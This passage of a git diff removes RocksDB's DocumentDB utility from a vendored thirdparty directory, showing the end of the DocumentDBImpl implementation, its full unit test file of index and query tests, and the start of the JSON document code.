-};
-
-class DocumentDBImpl : public DocumentDB {
- public:
-  DocumentDBImpl(
-      DB* db, ColumnFamilyHandle* primary_key_column_family,
-      const std::vector<std::pair<Index*, ColumnFamilyHandle*>>& indexes,
-      const Options& rocksdb_options)
-      : DocumentDB(db),
-        primary_key_column_family_(primary_key_column_family),
-        rocksdb_options_(rocksdb_options) {
-    for (const auto& index : indexes) {
-      name_to_index_.insert(
-          {index.first->Name(), IndexColumnFamily(index.first, index.second)});
-    }
-  }
-
-  ~DocumentDBImpl() {
-    for (auto& iter : name_to_index_) {
-      delete iter.second.index;
-      delete iter.second.column_family;
-    }
-    delete primary_key_column_family_;
-  }
-
-  virtual Status CreateIndex(const WriteOptions& write_options,
-                             const IndexDescriptor& index) override {
-    auto index_obj =
-        Index::CreateIndexFromDescription(*index.description, index.name);
-    if (index_obj == nullptr) {
-      return Status::InvalidArgument("Failed parsing index description");
-    }
-
-    ColumnFamilyHandle* cf_handle;
-    Status s =
-        CreateColumnFamily(ColumnFamilyOptions(rocksdb_options_),
-                           InternalSecondaryIndexName(index.name), &cf_handle);
-    if (!s.ok()) {
-      delete index_obj;
-      return s;
-    }
-
-    MutexLock l(&write_mutex_);
-
-    std::unique_ptr<CursorFromIterator> cursor(new CursorFromIterator(
-        DocumentDB::NewIterator(ReadOptions(), primary_key_column_family_)));
-
-    WriteBatch batch;
-    for (; cursor->Valid(); cursor->Next()) {
-      std::string secondary_index_key;
-      index_obj->GetIndexKey(cursor->document(), &secondary_index_key);
-      IndexKey index_key(Slice(secondary_index_key), cursor->key());
-      batch.Put(cf_handle, index_key.GetSliceParts(), SliceParts());
-    }
-
-    if (!cursor->status().ok()) {
-      delete index_obj;
-      return cursor->status();
-    }
-
-    {
-      MutexLock l_nti(&name_to_index_mutex_);
-      name_to_index_.insert(
-          {index.name, IndexColumnFamily(index_obj, cf_handle)});
-    }
-
-    return DocumentDB::Write(write_options, &batch);
-  }
-
-  virtual Status DropIndex(const std::string& name) override {
-    MutexLock l(&write_mutex_);
-
-    auto index_iter = name_to_index_.find(name);
-    if (index_iter == name_to_index_.end()) {
-      return Status::InvalidArgument("No such index");
-    }
-
-    Status s = DropColumnFamily(index_iter->second.column_family);
-    if (!s.ok()) {
-      return s;
-    }
-
-    delete index_iter->second.index;
-    delete index_iter->second.column_family;
-
-    // remove from name_to_index_
-    {
-      MutexLock l_nti(&name_to_index_mutex_);
-      name_to_index_.erase(index_iter);
-    }
-
-    return Status::OK();
-  }
-
-  virtual Status Insert(const WriteOptions& options,
-                        const JSONDocument& document) override {
-    WriteBatch batch;
-
-    if (!document.IsObject()) {
-      return Status::InvalidArgument("Document not an object");
-    }
-    if (!document.Contains(kPrimaryKey)) {
-      return Status::InvalidArgument("No primary key");
-    }
-    auto primary_key = document[kPrimaryKey];
-    if (primary_key.IsNull() ||
-        (!primary_key.IsString() && !primary_key.IsInt64())) {
-      return Status::InvalidArgument(
-          "Primary key format error");
-    }
-    std::string encoded_document;
-    document.Serialize(&encoded_document);
-    std::string primary_key_encoded;
-    if (!EncodeJSONPrimitive(primary_key, &primary_key_encoded)) {
-      // previous call should be guaranteed to pass because of all primary_key
-      // conditions checked before
-      assert(false);
-    }
-    Slice primary_key_slice(primary_key_encoded);
-
-    // Lock now, since we're starting DB operations
-    MutexLock l(&write_mutex_);
-    // check if there is already a document with the same primary key
-    PinnableSlice value;
-    Status s = DocumentDB::Get(ReadOptions(), primary_key_column_family_,
-                               primary_key_slice, &value);
-    if (!s.IsNotFound()) {
-      return s.ok() ? Status::InvalidArgument("Duplicate primary key!") : s;
-    }
-
-    batch.Put(primary_key_column_family_, primary_key_slice, encoded_document);
-
-    for (const auto& iter : name_to_index_) {
-      std::string secondary_index_key;
-      iter.second.index->GetIndexKey(document, &secondary_index_key);
-      IndexKey index_key(Slice(secondary_index_key), primary_key_slice);
-      batch.Put(iter.second.column_family, index_key.GetSliceParts(),
-                SliceParts());
-    }
-
-    return DocumentDB::Write(options, &batch);
-  }
-
-  virtual Status Remove(const ReadOptions& read_options,
-                        const WriteOptions& write_options,
-                        const JSONDocument& query) override {
-    MutexLock l(&write_mutex_);
-    std::unique_ptr<Cursor> cursor(
-        ConstructFilterCursor(read_options, nullptr, query));
-
-    WriteBatch batch;
-    for (; cursor->status().ok() && cursor->Valid(); cursor->Next()) {
-      const auto& document = cursor->document();
-      if (!document.IsObject()) {
-        return Status::Corruption("Document corruption");
-      }
-      if (!document.Contains(kPrimaryKey)) {
-        return Status::Corruption("Document corruption");
-      }
-      auto primary_key = document[kPrimaryKey];
-      if (primary_key.IsNull() ||
-          (!primary_key.IsString() && !primary_key.IsInt64())) {
-        return Status::Corruption("Document corruption");
-      }
-
-      // TODO(icanadi) Instead of doing this, just get primary key encoding from
-      // cursor, as it already has this information
-      std::string primary_key_encoded;
-      if (!EncodeJSONPrimitive(primary_key, &primary_key_encoded)) {
-        // previous call should be guaranteed to pass because of all primary_key
-        // conditions checked before
-        assert(false);
-      }
-      Slice primary_key_slice(primary_key_encoded);
-      batch.Delete(primary_key_column_family_, primary_key_slice);
-
-      for (const auto& iter : name_to_index_) {
-        std::string secondary_index_key;
-        iter.second.index->GetIndexKey(document, &secondary_index_key);
-        IndexKey index_key(Slice(secondary_index_key), primary_key_slice);
-        batch.Delete(iter.second.column_family, index_key.GetSliceParts());
-      }
-    }
-
-    if (!cursor->status().ok()) {
-      return cursor->status();
-    }
-
-    return DocumentDB::Write(write_options, &batch);
-  }
-
-  virtual Status Update(const ReadOptions& read_options,
-                        const WriteOptions& write_options,
-                        const JSONDocument& filter,
-                        const JSONDocument& updates) override {
-    MutexLock l(&write_mutex_);
-    std::unique_ptr<Cursor> cursor(
-        ConstructFilterCursor(read_options, nullptr, filter));
-
-    if (!updates.IsObject()) {
-        return Status::Corruption("Bad update document format");
-    }
-    WriteBatch batch;
-    for (; cursor->status().ok() && cursor->Valid(); cursor->Next()) {
-      const auto& old_document = cursor->document();
-      JSONDocument new_document(old_document);
-      if (!new_document.IsObject()) {
-        return Status::Corruption("Document corruption");
-      }
-      // TODO(icanadi) Make this nicer, something like class Filter
-      for (const auto& update : updates.Items()) {
-        if (update.first == "$set") {
-          JSONDocumentBuilder builder;
-          bool res __attribute__((unused)) = builder.WriteStartObject();
-          assert(res);
-          for (const auto& itr : update.second.Items()) {
-            if (itr.first == kPrimaryKey) {
-              return Status::NotSupported("Please don't change primary key");
-            }
-            res = builder.WriteKeyValue(itr.first, itr.second);
-            assert(res);
-          }
-          res = builder.WriteEndObject();
-          assert(res);
-          JSONDocument update_document = builder.GetJSONDocument();
-          builder.Reset();
-          res = builder.WriteStartObject();
-          assert(res);
-          for (const auto& itr : new_document.Items()) {
-            if (update_document.Contains(itr.first)) {
-              res = builder.WriteKeyValue(itr.first,
-                                          update_document[itr.first]);
-            } else {
-              res = builder.WriteKeyValue(itr.first, new_document[itr.first]);
-            }
-            assert(res);
-          }
-          res = builder.WriteEndObject();
-          assert(res);
-          new_document = builder.GetJSONDocument();
-          assert(new_document.IsOwner());
-        } else {
-          // TODO(icanadi) more commands
-          return Status::InvalidArgument("Can't understand update command");
-        }
-      }
-
-      // TODO(icanadi) reuse some of this code
-      if (!new_document.Contains(kPrimaryKey)) {
-        return Status::Corruption("Corrupted document -- primary key missing");
-      }
-      auto primary_key = new_document[kPrimaryKey];
-      if (primary_key.IsNull() ||
-          (!primary_key.IsString() && !primary_key.IsInt64())) {
-        // This will happen when document on storage doesn't have primary key,
-        // since we don't support any update operations on primary key. That's
-        // why this is corruption error
-        return Status::Corruption("Corrupted document -- primary key missing");
-      }
-      std::string encoded_document;
-      new_document.Serialize(&encoded_document);
-      std::string primary_key_encoded;
-      if (!EncodeJSONPrimitive(primary_key, &primary_key_encoded)) {
-        // previous call should be guaranteed to pass because of all primary_key
-        // conditions checked before
-        assert(false);
-      }
-      Slice primary_key_slice(primary_key_encoded);
-      batch.Put(primary_key_column_family_, primary_key_slice,
-                encoded_document);
-
-      for (const auto& iter : name_to_index_) {
-        std::string old_key, new_key;
-        iter.second.index->GetIndexKey(old_document, &old_key);
-        iter.second.index->GetIndexKey(new_document, &new_key);
-        if (old_key == new_key) {
-          // don't need to update this secondary index
-          continue;
-        }
-
-        IndexKey old_index_key(Slice(old_key), primary_key_slice);
-        IndexKey new_index_key(Slice(new_key), primary_key_slice);
-
-        batch.Delete(iter.second.column_family, old_index_key.GetSliceParts());
-        batch.Put(iter.second.column_family, new_index_key.GetSliceParts(),
-                  SliceParts());
-      }
-    }
-
-    if (!cursor->status().ok()) {
-      return cursor->status();
-    }
-
-    return DocumentDB::Write(write_options, &batch);
-  }
-
-  virtual Cursor* Query(const ReadOptions& read_options,
-                        const JSONDocument& query) override {
-    Cursor* cursor = nullptr;
-
-    if (!query.IsArray()) {
-      return new CursorError(
-          Status::InvalidArgument("Query has to be an array"));
-    }
-
-    // TODO(icanadi) support index "_id"
-    for (size_t i = 0; i < query.Count(); ++i) {
-      const auto& command_doc = query[i];
-      if (command_doc.Count() != 1) {
-        // there can be only one key-value pair in each of array elements.
-        // key is the command and value are the params
-        delete cursor;
-        return new CursorError(Status::InvalidArgument("Invalid query"));
-      }
-      const auto& command = *command_doc.Items().begin();
-
-      if (command.first == "$filter") {
-        cursor = ConstructFilterCursor(read_options, cursor, command.second);
-      } else {
-        // only filter is supported for now
-        delete cursor;
-        return new CursorError(Status::InvalidArgument("Invalid query"));
-      }
-    }
-
-    if (cursor == nullptr) {
-      cursor = new CursorFromIterator(
-          DocumentDB::NewIterator(read_options, primary_key_column_family_));
-    }
-
-    return cursor;
-  }
-
-  // RocksDB functions
-  using DB::Get;
-  virtual Status Get(const ReadOptions& options,
-                     ColumnFamilyHandle* column_family, const Slice& key,
-                     PinnableSlice* value) override {
-    return Status::NotSupported("");
-  }
-  virtual Status Get(const ReadOptions& options, const Slice& key,
-                     std::string* value) override {
-    return Status::NotSupported("");
-  }
-  virtual Status Write(const WriteOptions& options,
-                       WriteBatch* updates) override {
-    return Status::NotSupported("");
-  }
-  virtual Iterator* NewIterator(const ReadOptions& options,
-                                ColumnFamilyHandle* column_family) override {
-    return nullptr;
-  }
-  virtual Iterator* NewIterator(const ReadOptions& options) override {
-    return nullptr;
-  }
-
- private:
-  Cursor* ConstructFilterCursor(ReadOptions read_options, Cursor* cursor,
-                                const JSONDocument& query) {
-    std::unique_ptr<const Filter> filter(Filter::ParseFilter(query));
-    if (filter.get() == nullptr) {
-      return new CursorError(Status::InvalidArgument("Invalid query"));
-    }
-
-    IndexColumnFamily tmp_storage(nullptr, nullptr);
-
-    if (cursor == nullptr) {
-      IndexColumnFamily* index_column_family = nullptr;
-      if (query.Contains("$index") && query["$index"].IsString()) {
-        {
-          auto index_name = query["$index"];
-          MutexLock l(&name_to_index_mutex_);
-          auto index_iter = name_to_index_.find(index_name.GetString());
-          if (index_iter != name_to_index_.end()) {
-            tmp_storage = index_iter->second;
-            index_column_family = &tmp_storage;
-          } else {
-            return new CursorError(
-                Status::InvalidArgument("Index does not exist"));
-          }
-        }
-      }
-
-      if (index_column_family != nullptr &&
-          index_column_family->index->UsefulIndex(*filter.get())) {
-        std::vector<Iterator*> iterators;
-        Status s = DocumentDB::NewIterators(
-            read_options,
-            {primary_key_column_family_, index_column_family->column_family},
-            &iterators);
-        if (!s.ok()) {
-          delete cursor;
-          return new CursorError(s);
-        }
-        assert(iterators.size() == 2);
-        return new CursorWithFilterIndexed(iterators[0], iterators[1],
-                                           index_column_family->index,
-                                           filter.release());
-      } else {
-        return new CursorWithFilter(
-            new CursorFromIterator(DocumentDB::NewIterator(
-                read_options, primary_key_column_family_)),
-            filter.release());
-      }
-    } else {
-      return new CursorWithFilter(cursor, filter.release());
-    }
-    assert(false);
-    return nullptr;
-  }
-
-  // currently, we lock and serialize all writes to rocksdb. reads are not
-  // locked and always get consistent view of the database. we should optimize
-  // locking in the future
-  port::Mutex write_mutex_;
-  port::Mutex name_to_index_mutex_;
-  const char* kPrimaryKey = "_id";
-  struct IndexColumnFamily {
-    IndexColumnFamily(Index* _index, ColumnFamilyHandle* _column_family)
-        : index(_index), column_family(_column_family) {}
-    Index* index;
-    ColumnFamilyHandle* column_family;
-  };
-
-
-  // name_to_index_ protected:
-  // 1) when writing -- 1. lock write_mutex_, 2. lock name_to_index_mutex_
-  // 2) when reading -- lock name_to_index_mutex_ OR write_mutex_
-  std::unordered_map<std::string, IndexColumnFamily> name_to_index_;
-  ColumnFamilyHandle* primary_key_column_family_;
-  Options rocksdb_options_;
-};
-
-namespace {
-Options GetRocksDBOptionsFromOptions(const DocumentDBOptions& options) {
-  Options rocksdb_options;
-  rocksdb_options.max_background_compactions = options.background_threads - 1;
-  rocksdb_options.max_background_flushes = 1;
-  rocksdb_options.write_buffer_size = options.memtable_size;
-  rocksdb_options.max_write_buffer_number = 6;
-  BlockBasedTableOptions table_options;
-  table_options.block_cache = NewLRUCache(options.cache_size);
-  rocksdb_options.table_factory.reset(NewBlockBasedTableFactory(table_options));
-  return rocksdb_options;
-}
-}  // namespace
-
-Status DocumentDB::Open(const DocumentDBOptions& options,
-                        const std::string& name,
-                        const std::vector<DocumentDB::IndexDescriptor>& indexes,
-                        DocumentDB** db, bool read_only) {
-  Options rocksdb_options = GetRocksDBOptionsFromOptions(options);
-  rocksdb_options.create_if_missing = true;
-
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(ColumnFamilyDescriptor(
-      kDefaultColumnFamilyName, ColumnFamilyOptions(rocksdb_options)));
-  for (const auto& index : indexes) {
-    column_families.emplace_back(InternalSecondaryIndexName(index.name),
-                                 ColumnFamilyOptions(rocksdb_options));
-  }
-  std::vector<ColumnFamilyHandle*> handles;
-  DB* base_db;
-  Status s;
-  if (read_only) {
-    s = DB::OpenForReadOnly(DBOptions(rocksdb_options), name, column_families,
-                            &handles, &base_db);
-  } else {
-    s = DB::Open(DBOptions(rocksdb_options), name, column_families, &handles,
-                 &base_db);
-  }
-  if (!s.ok()) {
-    return s;
-  }
-
-  std::vector<std::pair<Index*, ColumnFamilyHandle*>> index_cf(indexes.size());
-  assert(handles.size() == indexes.size() + 1);
-  for (size_t i = 0; i < indexes.size(); ++i) {
-    auto index = Index::CreateIndexFromDescription(*indexes[i].description,
-                                                   indexes[i].name);
-    index_cf[i] = {index, handles[i + 1]};
-  }
-  *db = new DocumentDBImpl(base_db, handles[0], index_cf, rocksdb_options);
-  return Status::OK();
-}
-
-}  // namespace rocksdb
-#endif  // ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/document_db_test.cc b/thirdparty/rocksdb/utilities/document/document_db_test.cc
deleted file mode 100644
index e8f4138..0000000
--- a/thirdparty/rocksdb/utilities/document/document_db_test.cc
+++ /dev/null
@@ -1,336 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#ifndef ROCKSDB_LITE
-
-#include <algorithm>
-
-#include "rocksdb/utilities/json_document.h"
-#include "rocksdb/utilities/document_db.h"
-
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-class DocumentDBTest : public testing::Test {
- public:
-  DocumentDBTest() {
-    dbname_ = test::TmpDir() + "/document_db_test";
-    DestroyDB(dbname_, Options());
-  }
-  ~DocumentDBTest() {
-    delete db_;
-    DestroyDB(dbname_, Options());
-  }
-
-  void AssertCursorIDs(Cursor* cursor, std::vector<int64_t> expected) {
-    std::vector<int64_t> got;
-    while (cursor->Valid()) {
-      ASSERT_TRUE(cursor->Valid());
-      ASSERT_TRUE(cursor->document().Contains("_id"));
-      got.push_back(cursor->document()["_id"].GetInt64());
-      cursor->Next();
-    }
-    std::sort(expected.begin(), expected.end());
-    std::sort(got.begin(), got.end());
-    ASSERT_TRUE(got == expected);
-  }
-
-  // converts ' to ", so that we don't have to escape " all over the place
-  std::string ConvertQuotes(const std::string& input) {
-    std::string output;
-    for (auto x : input) {
-      if (x == '\'') {
-        output.push_back('\"');
-      } else {
-        output.push_back(x);
-      }
-    }
-    return output;
-  }
-
-  void CreateIndexes(std::vector<DocumentDB::IndexDescriptor> indexes) {
-    for (auto i : indexes) {
-      ASSERT_OK(db_->CreateIndex(WriteOptions(), i));
-    }
-  }
-
-  JSONDocument* Parse(const std::string& doc) {
-    return JSONDocument::ParseJSON(ConvertQuotes(doc).c_str());
-  }
-
-  std::string dbname_;
-  DocumentDB* db_;
-};
-
-TEST_F(DocumentDBTest, SimpleQueryTest) {
-  DocumentDBOptions options;
-  DocumentDB::IndexDescriptor index;
-  index.description = Parse("{\"name\": 1}");
-  index.name = "name_index";
-
-  ASSERT_OK(DocumentDB::Open(options, dbname_, {}, &db_));
-  CreateIndexes({index});
-  delete db_;
-  // now there is index present
-  ASSERT_OK(DocumentDB::Open(options, dbname_, {index}, &db_));
-  delete index.description;
-
-  std::vector<std::string> json_objects = {
-      "{\"_id\': 1, \"name\": \"One\"}",   "{\"_id\": 2, \"name\": \"Two\"}",
-      "{\"_id\": 3, \"name\": \"Three\"}", "{\"_id\": 4, \"name\": \"Four\"}"};
-
-  for (auto& json : json_objects) {
-    std::unique_ptr<JSONDocument> document(Parse(json));
-    ASSERT_TRUE(document.get() != nullptr);
-    ASSERT_OK(db_->Insert(WriteOptions(), *document));
-  }
-
-  // inserting a document with existing primary key should return failure
-  {
-    std::unique_ptr<JSONDocument> document(Parse(json_objects[0]));
-    ASSERT_TRUE(document.get() != nullptr);
-    Status s = db_->Insert(WriteOptions(), *document);
-    ASSERT_TRUE(s.IsInvalidArgument());
-  }
-
-  // find equal to "Two"
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'name': 'Two', '$index': 'name_index'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {2});
-  }
-
-  // find less than "Three"
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'name': {'$lt': 'Three'}, '$index': "
-        "'name_index'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-
-    AssertCursorIDs(cursor.get(), {1, 4});
-  }
-
-  // find less than "Three" without index
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'name': {'$lt': 'Three'} }}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {1, 4});
-  }
-
-  // remove less or equal to "Three"
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("{'name': {'$lte': 'Three'}, '$index': 'name_index'}"));
-    ASSERT_OK(db_->Remove(ReadOptions(), WriteOptions(), *query));
-  }
-
-  // find all -- only "Two" left, everything else should be deleted
-  {
-    std::unique_ptr<JSONDocument> query(Parse("[]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {2});
-  }
-}
-
-TEST_F(DocumentDBTest, ComplexQueryTest) {
-  DocumentDBOptions options;
-  DocumentDB::IndexDescriptor priority_index;
-  priority_index.description = Parse("{'priority': 1}");
-  priority_index.name = "priority";
-  DocumentDB::IndexDescriptor job_name_index;
-  job_name_index.description = Parse("{'job_name': 1}");
-  job_name_index.name = "job_name";
-  DocumentDB::IndexDescriptor progress_index;
-  progress_index.description = Parse("{'progress': 1}");
-  progress_index.name = "progress";
-
-  ASSERT_OK(DocumentDB::Open(options, dbname_, {}, &db_));
-  CreateIndexes({priority_index, progress_index});
-  delete priority_index.description;
-  delete progress_index.description;
-
-  std::vector<std::string> json_objects = {
-      "{'_id': 1, 'job_name': 'play', 'priority': 10, 'progress': 14.2}",
-      "{'_id': 2, 'job_name': 'white', 'priority': 2, 'progress': 45.1}",
-      "{'_id': 3, 'job_name': 'straw', 'priority': 5, 'progress': 83.2}",
-      "{'_id': 4, 'job_name': 'temporary', 'priority': 3, 'progress': 14.9}",
-      "{'_id': 5, 'job_name': 'white', 'priority': 4, 'progress': 44.2}",
-      "{'_id': 6, 'job_name': 'tea', 'priority': 1, 'progress': 12.4}",
-      "{'_id': 7, 'job_name': 'delete', 'priority': 2, 'progress': 77.54}",
-      "{'_id': 8, 'job_name': 'rock', 'priority': 3, 'progress': 93.24}",
-      "{'_id': 9, 'job_name': 'steady', 'priority': 3, 'progress': 9.1}",
-      "{'_id': 10, 'job_name': 'white', 'priority': 1, 'progress': 61.4}",
-      "{'_id': 11, 'job_name': 'who', 'priority': 4, 'progress': 39.41}",
-      "{'_id': 12, 'job_name': 'who', 'priority': -1, 'progress': 39.42}",
-      "{'_id': 13, 'job_name': 'who', 'priority': -2, 'progress': 39.42}", };
-
-  // add index on the fly!
-  CreateIndexes({job_name_index});
-  delete job_name_index.description;
-
-  for (auto& json : json_objects) {
-    std::unique_ptr<JSONDocument> document(Parse(json));
-    ASSERT_TRUE(document != nullptr);
-    ASSERT_OK(db_->Insert(WriteOptions(), *document));
-  }
-
-  // 2 < priority < 4 AND progress > 10.0, index priority
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$lt': 4, '$gt': 2}, 'progress': {'$gt': "
-        "10.0}, '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {4, 8});
-  }
-
-  // -1 <= priority <= 1, index priority
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$lte': 1, '$gte': -1},"
-        " '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {6, 10, 12});
-  }
-
-  // 2 < priority < 4 AND progress > 10.0, index progress
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$lt': 4, '$gt': 2}, 'progress': {'$gt': "
-        "10.0}, '$index': 'progress'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {4, 8});
-  }
-
-  // job_name == 'white' AND priority >= 2, index job_name
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'job_name': 'white', 'priority': {'$gte': "
-        "2}, '$index': 'job_name'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {2, 5});
-  }
-
-  // 35.0 <= progress < 65.5, index progress
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'progress': {'$gt': 5.0, '$gte': 35.0, '$lt': 65.5}, "
-        "'$index': 'progress'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {2, 5, 10, 11, 12, 13});
-  }
-
-  // 2 < priority <= 4, index priority
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$gt': 2, '$lt': 8, '$lte': 4}, "
-        "'$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {4, 5, 8, 9, 11});
-  }
-
-  // Delete all whose progress is bigger than 50%
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("{'progress': {'$gt': 50.0}, '$index': 'progress'}"));
-    ASSERT_OK(db_->Remove(ReadOptions(), WriteOptions(), *query));
-  }
-
-  // 2 < priority < 6, index priority
-  {
-    std::unique_ptr<JSONDocument> query(Parse(
-        "[{'$filter': {'priority': {'$gt': 2, '$lt': 6}, "
-        "'$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    AssertCursorIDs(cursor.get(), {4, 5, 9, 11});
-  }
-
-  // update set priority to 10 where job_name is 'white'
-  {
-    std::unique_ptr<JSONDocument> query(Parse("{'job_name': 'white'}"));
-    std::unique_ptr<JSONDocument> update(Parse("{'$set': {'priority': 10}}"));
-    ASSERT_OK(db_->Update(ReadOptions(), WriteOptions(), *query, *update));
-  }
-
-  // update twice: set priority to 15 where job_name is 'white'
-  {
-    std::unique_ptr<JSONDocument> query(Parse("{'job_name': 'white'}"));
-    std::unique_ptr<JSONDocument> update(Parse("{'$set': {'priority': 10},"
-                                               "'$set': {'priority': 15}}"));
-    ASSERT_OK(db_->Update(ReadOptions(), WriteOptions(), *query, *update));
-  }
-
-  // update twice: set priority to 15 and
-  // progress to 40 where job_name is 'white'
-  {
-    std::unique_ptr<JSONDocument> query(Parse("{'job_name': 'white'}"));
-    std::unique_ptr<JSONDocument> update(
-        Parse("{'$set': {'priority': 10, 'progress': 35},"
-              "'$set': {'priority': 15, 'progress': 40}}"));
-    ASSERT_OK(db_->Update(ReadOptions(), WriteOptions(), *query, *update));
-  }
-
-  // priority < 0
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'priority': {'$lt': 0}, '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    ASSERT_OK(cursor->status());
-    AssertCursorIDs(cursor.get(), {12, 13});
-  }
-
-  // -2 < priority < 0
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'priority': {'$gt': -2, '$lt': 0},"
-        " '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    ASSERT_OK(cursor->status());
-    AssertCursorIDs(cursor.get(), {12});
-  }
-
-  // -2 <= priority < 0
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'priority': {'$gte': -2, '$lt': 0},"
-        " '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    ASSERT_OK(cursor->status());
-    AssertCursorIDs(cursor.get(), {12, 13});
-  }
-
-  // 4 < priority
-  {
-    std::unique_ptr<JSONDocument> query(
-        Parse("[{'$filter': {'priority': {'$gt': 4}, '$index': 'priority'}}]"));
-    std::unique_ptr<Cursor> cursor(db_->Query(ReadOptions(), *query));
-    ASSERT_OK(cursor->status());
-    AssertCursorIDs(cursor.get(), {1, 2, 5});
-  }
-
-  Status s = db_->DropIndex("doesnt-exist");
-  ASSERT_TRUE(!s.ok());
-  ASSERT_OK(db_->DropIndex("priority"));
-}
-
-}  //  namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as DocumentDB is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/document/json_document.cc b/thirdparty/rocksdb/utilities/document/json_document.cc
deleted file mode 100644
index 6917923..0000000
--- a/thirdparty/rocksdb/utilities/document/json_document.cc
+++ /dev/null
@@ -1,609 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#ifndef ROCKSDB_LITE
-
-#include "rocksdb/utilities/json_document.h"
-
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <assert.h>
-#include <inttypes.h>
-#include <string.h>
-
-#include <functional>
-#include <limits>
-#include <map>
-#include <memory>
-#include <string>
-#include <vector>
-
-
-#include "third-party/fbson/FbsonDocument.h"
-#include "third-party/fbson/FbsonJsonParser.h"
-#include "third-party/fbson/FbsonUtil.h"
-#include "util/coding.h"
-
-using std::placeholders::_1;
-
-namespace {
-
-size_t ObjectNumElem(const fbson::ObjectVal& objectVal) {
-  size_t size = 0;
-  for (auto keyValuePair : objectVal) {
-    (void)keyValuePair;
-    ++size;
-  }
-  return size;
-}
-
-template <typename Func>
-void InitJSONDocument(std::unique_ptr<char[]>* data,
-                      fbson::FbsonValue** value,
-                      Func f) {
-  // TODO(stash): maybe add function to FbsonDocument to avoid creating array?
-  fbson::FbsonWriter writer;
-  bool res __attribute__((unused)) = writer.writeStartArray();
-  assert(res);
-  uint32_t bytesWritten __attribute__((unused)) = f(writer);
-  assert(bytesWritten != 0);
-  res = writer.writeEndArray();
-  assert(res);
-  char* buf = new char[writer.getOutput()->getSize()];
-  memcpy(buf, writer.getOutput()->getBuffer(), writer.getOutput()->getSize());
-
-  *value = ((fbson::FbsonDocument *)buf)->getValue();
-  assert((*value)->isArray());
-  assert(((fbson::ArrayVal*)*value)->numElem() == 1);
-  *value = ((fbson::ArrayVal*)*value)->get(0);
-  data->reset(buf);
-}
-
-void InitString(std::unique_ptr<char[]>* data,
-                fbson::FbsonValue** value,
-                const std::string& s) {
-  InitJSONDocument(data, value, std::bind(
-      [](fbson::FbsonWriter& writer, const std::string& str) -> uint32_t {
-        bool res __attribute__((unused)) = writer.writeStartString();
-        assert(res);
-        auto bytesWritten = writer.writeString(str.c_str(),
-                            static_cast<uint32_t>(str.length()));
-        res = writer.writeEndString();
-        assert(res);
-        // If the string is empty, then bytesWritten == 0, and assert in
-        // InitJsonDocument will fail.
-        return bytesWritten + static_cast<uint32_t>(str.empty());
-      },
-  _1, s));
-}
-
-bool IsNumeric(fbson::FbsonValue* value) {
-  return value->isInt8() || value->isInt16() ||
-         value->isInt32() ||  value->isInt64();
-}
-
-int64_t GetInt64ValFromFbsonNumericType(fbson::FbsonValue* value) {
-  switch (value->type()) {
-    case fbson::FbsonType::T_Int8:
